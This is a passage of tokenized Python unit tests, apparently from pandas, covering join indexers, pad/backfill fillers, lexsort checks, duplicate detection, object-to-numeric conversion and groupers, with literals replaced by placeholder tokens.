<NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> old = Index ( [ <NUM_LIT:5> , <NUM_LIT:10> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:5> ) ) <EOL> filler = algos . pad_int64 ( old . values , new . values ) <EOL> expect_filler = [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> def test_left_join_indexer_unique ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> result = algos . left_join_indexer_unique_int64 ( b , a ) <EOL> expected = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_left_outer_join_bug ( ) : <EOL> left = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:3> , <EOL> <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <EOL> <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> , <EOL> <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <EOL> <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> right = np . array ( [ <NUM_LIT:3> , <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> max_groups = <NUM_LIT:4> <EOL> lidx , ridx = algos . left_outer_join ( left , right , max_groups , sort = False ) <EOL> exp_lidx = np . arange ( len ( left ) ) <EOL> exp_ridx = - np . ones ( len ( left ) ) <EOL> exp_ridx [ left == <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> exp_ridx [ left == <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> assert ( np . array_equal ( lidx , exp_lidx ) ) <EOL> assert ( np . array_equal ( ridx , exp_ridx ) ) <EOL> def test_inner_join_indexer ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . inner_join_indexer_int64 ( a , b ) <EOL> index_exp = np . array ( [ <NUM_LIT:3> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( index , index_exp ) <EOL> aexp = np . array ( [ <NUM_LIT:2> , <NUM_LIT:4> ] ) <EOL> bexp = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> assert_almost_equal ( ares , aexp ) <EOL> assert_almost_equal ( bres , bexp ) <EOL> a = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . inner_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , [ <NUM_LIT:5> ] ) <EOL> assert_almost_equal ( ares , [ <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( bres , [ <NUM_LIT:0> ] ) <EOL> def test_outer_join_indexer ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . outer_join_indexer_int64 ( a , b ) <EOL> index_exp = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( index , index_exp ) <EOL> aexp = np . array ( [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> bexp = np . array ( [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_almost_equal ( ares , aexp ) <EOL> assert_almost_equal ( bres , bexp ) <EOL> a = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . outer_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , [ <NUM_LIT:5> ] ) <EOL> assert_almost_equal ( ares , [ <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( bres , [ <NUM_LIT:0> ] ) <EOL> def test_left_join_indexer ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . left_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , a ) <EOL> aexp = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> bexp = np . array ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ares , aexp ) <EOL> assert_almost_equal ( bres , bexp ) <EOL> a = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . left_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , [ <NUM_LIT:5> ] ) <EOL> assert_almost_equal ( ares , [ <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( bres , [ <NUM_LIT:0> ] ) <EOL> def test_left_join_indexer2 ( ) : <EOL> idx = Index ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) <EOL> idx2 = Index ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] ) <EOL> res , lidx , ridx = algos . left_join_indexer_int64 ( idx2 . values , idx . values ) <EOL> exp_res = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( res , exp_res ) <EOL> exp_lidx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( lidx , exp_lidx ) <EOL> exp_ridx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ridx , exp_ridx ) <EOL> def test_outer_join_indexer2 ( ) : <EOL> idx = Index ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) <EOL> idx2 = Index ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] ) <EOL> res , lidx , ridx = algos . outer_join_indexer_int64 ( idx2 . values , idx . values ) <EOL> exp_res = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( res , exp_res ) <EOL> exp_lidx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( lidx , exp_lidx ) <EOL> exp_ridx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ridx , exp_ridx ) <EOL> def test_inner_join_indexer2 ( ) : <EOL> idx = Index ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) <EOL> idx2 = Index ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] ) <EOL> res , lidx , ridx = algos . inner_join_indexer_int64 ( idx2 . values , idx . values ) <EOL> exp_res = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( res , exp_res ) <EOL> exp_lidx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( lidx , exp_lidx ) <EOL> exp_ridx = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( ridx , exp_ridx ) <EOL> def test_is_lexsorted ( ) : <EOL> failure = [ <EOL> np . array ( [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) , <EOL> np . array ( [ <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <EOL> <NUM_LIT:15> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT:12> , <NUM_LIT:11> , <EOL> <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <EOL> <NUM_LIT:9> , <NUM_LIT:8> , <EOL> <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <EOL> <NUM_LIT:6> , <NUM_LIT:5> , <EOL> <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ] ) ] <EOL> assert ( not algos . is_lexsorted ( failure ) ) <EOL> def test_groupsort_indexer ( ) : <EOL> a = np . random . randint ( <NUM_LIT:0> , <NUM_LIT:1000> , <NUM_LIT:100> ) . astype ( np . int64 ) <EOL> b = np . random . randint ( <NUM_LIT:0> , <NUM_LIT:1000> , <NUM_LIT:100> ) . astype ( np . int64 ) <EOL> result = algos . groupsort_indexer ( a , <NUM_LIT:1000> ) [ <NUM_LIT:0> ] <EOL> expected = np . argsort ( a , kind = '<STR_LIT>' ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> key = a * <NUM_LIT:1000> + b <EOL> result = algos . groupsort_indexer ( key , <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> expected = np . lexsort ( ( b , a ) ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_ensure_platform_int ( ) : <EOL> arr = np . arange ( <NUM_LIT:100> ) <EOL> result = algos . ensure_platform_int ( arr ) <EOL> assert ( result is arr ) <EOL> def test_duplicated_with_nas ( ) : <EOL> keys = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , nan , <NUM_LIT:0> , <NUM_LIT:2> , nan ] , dtype = object ) <EOL> result = lib . duplicated ( keys ) <EOL> expected = [ False , False , False , True , False , True ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = '<STR_LIT>' ) <EOL> expected = [ False , False , False , True , False , True ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = '<STR_LIT>' ) <EOL> expected = [ True , False , True , False , False , False ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = False ) <EOL> expected = [ True , False , True , True , False , True ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> keys = np . empty ( <NUM_LIT:8> , dtype = object ) <EOL> for i , t in enumerate ( zip ( [ <NUM_LIT:0> , <NUM_LIT:0> , nan , nan ] * <NUM_LIT:2> , [ <NUM_LIT:0> , nan , <NUM_LIT:0> , nan ] * <NUM_LIT:2> ) ) : <EOL> keys [ i ] = t <EOL> result = lib . duplicated ( keys ) <EOL> falses = [ False ] * <NUM_LIT:4> <EOL> trues = [ True ] * <NUM_LIT:4> <EOL> expected = falses + trues <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = '<STR_LIT>' ) <EOL> expected = trues + falses <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = lib . duplicated ( keys , keep = False ) <EOL> expected = trues + trues <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_maybe_booleans_to_slice ( ) : <EOL> arr = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , dtype = np . uint8 ) <EOL> result = lib . maybe_booleans_to_slice ( arr ) <EOL> assert ( result . dtype == np . bool_ ) <EOL> result = lib . maybe_booleans_to_slice ( arr [ : <NUM_LIT:0> ] ) <EOL> assert ( result == slice ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> def test_convert_objects ( ) : <EOL> arr = np . array ( [ '<STR_LIT:a>' , '<STR_LIT:b>' , nan , nan , '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_objects ( arr ) <EOL> assert ( result . dtype == np . object_ ) <EOL> def test_convert_infs ( ) : <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_numeric ( arr , set ( ) , False ) <EOL> assert ( result . dtype == np . float64 ) <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_numeric ( arr , set ( ) , False ) <EOL> assert ( result . dtype == np . float64 ) <EOL> def test_scientific_no_exponent ( ) : <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . maybe_convert_numeric ( arr , set ( ) , False , True ) <EOL> assert np . all ( np . isnan ( result ) ) <EOL> def test_convert_objects_ints ( ) : <EOL> dtypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for dtype_str in dtypes : <EOL> arr = np . array ( list ( np . arange ( <NUM_LIT:20> , dtype = dtype_str ) ) , dtype = '<STR_LIT:O>' ) <EOL> assert ( arr [ <NUM_LIT:0> ] . dtype == np . dtype ( dtype_str ) ) <EOL> result = lib . maybe_convert_objects ( arr ) <EOL> assert ( issubclass ( result . dtype . type , np . integer ) ) <EOL> def test_convert_objects_complex_number ( ) : <EOL> for dtype in np . sctypes [ '<STR_LIT>' ] : <EOL> arr = np . array ( list ( <NUM_LIT> * np . arange ( <NUM_LIT:20> , dtype = dtype ) ) , dtype = '<STR_LIT:O>' ) <EOL> assert ( arr [ <NUM_LIT:0> ] . dtype == np . dtype ( dtype ) ) <EOL> result = lib . maybe_convert_objects ( arr ) <EOL> assert ( issubclass ( result . dtype . type , np . complexfloating ) ) <EOL> def test_rank ( ) : <EOL> tm . _skip_if_no_scipy ( ) <EOL> from scipy . stats import rankdata <EOL> def _check ( arr ) : <EOL> mask = ~ np . isfinite ( arr ) <EOL> arr = arr . copy ( ) <EOL> result = algos . rank_1d_float64 ( arr ) <EOL> arr [ mask ] = np . inf <EOL> exp = rankdata ( arr ) <EOL> exp [ mask ] = nan <EOL> assert_almost_equal ( result , exp ) <EOL> _check ( np . array ( [ nan , nan , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , nan ] ) ) <EOL> _check ( np . array ( [ <NUM_LIT> , nan , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , nan ] ) ) <EOL> def test_get_reverse_indexer ( ) : <EOL> indexer = np . array ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> result = lib . get_reverse_indexer ( indexer , <NUM_LIT:5> ) <EOL> expected = np . array ( [ <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:7> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_pad_backfill_object_segfault ( ) : <EOL> old = np . array ( [ ] , dtype = '<STR_LIT:O>' ) <EOL> new = np . array ( [ datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = algos . pad_object ( old , new ) <EOL> expected = np . array ( [ - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = algos . pad_object ( new , old ) <EOL> expected = np . array ( [ ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = algos . backfill_object ( old , new ) <EOL> expected = np . array ( [ - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> result = algos . backfill_object ( new , old ) <EOL> expected = np . array ( [ ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_arrmap ( ) : <EOL> values = np . array ( [ '<STR_LIT:foo>' , '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = algos . arrmap_object ( values , lambda x : x in [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] ) <EOL> assert ( result . dtype == np . bool_ ) <EOL> def test_series_grouper ( ) : <EOL> from pandas import Series <EOL> obj = Series ( np . random . randn ( <NUM_LIT:10> ) ) <EOL> dummy = obj [ : <NUM_LIT:0> ] <EOL> labels = np . array ( [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> grouper = lib . SeriesGrouper ( obj , np . mean , labels , <NUM_LIT:2> , dummy ) <EOL> result , counts = grouper . get_result ( ) <EOL> expected = np . array ( [ obj [ <NUM_LIT:3> : <NUM_LIT:6> ] . mean ( ) , obj [ <NUM_LIT:6> : ] . mean ( ) ] ) <EOL> assert_almost_equal ( result , expected ) <EOL> exp_counts = np . array ( [ <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( counts , exp_counts ) <EOL> def test_series_bin_grouper ( ) : <EOL> from pandas import Series <EOL> obj = Series ( np . random . randn ( <NUM_LIT:10> ) ) <EOL> dummy = obj [ : <NUM_LIT:0> ] <EOL> bins = np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> ] ) <EOL> grouper = lib . SeriesBinGrouper ( obj , np . mean , bins , dummy ) <EOL> result , counts = grouper . get_result ( ) <EOL> expected = np . array ( [ obj [ : <NUM_LIT:3> ] . mean ( ) , obj [ <NUM_LIT:3> : <NUM_LIT:6> ] . mean ( ) , obj [ <NUM_LIT:6> : ] . mean ( ) ] ) <EOL> assert_almost_equal ( result , expected ) <EOL> exp_counts = np . array ( [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( counts , exp_counts ) <EOL> class TestBinGroupers ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def setUp ( self ) : <EOL> self . obj = np . random . randn ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> self . labels = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> self . bins = np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> def test_generate_bins ( self ) : <EOL> from pandas . core . groupby import generate_bins_generic <EOL> values = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> binner = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> for func in [ lib . generate_bins_dt64 , generate_bins_generic ] : <EOL> bins = func ( values , binner , closed = '<STR_LIT:left>' ) <EOL> assert ( ( bins == np . array ( [ <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:6> ] ) ) . all ( ) ) <EOL> bins = func ( values , binner , closed = '<STR_LIT:right>' ) <EOL> assert ( ( bins == np . 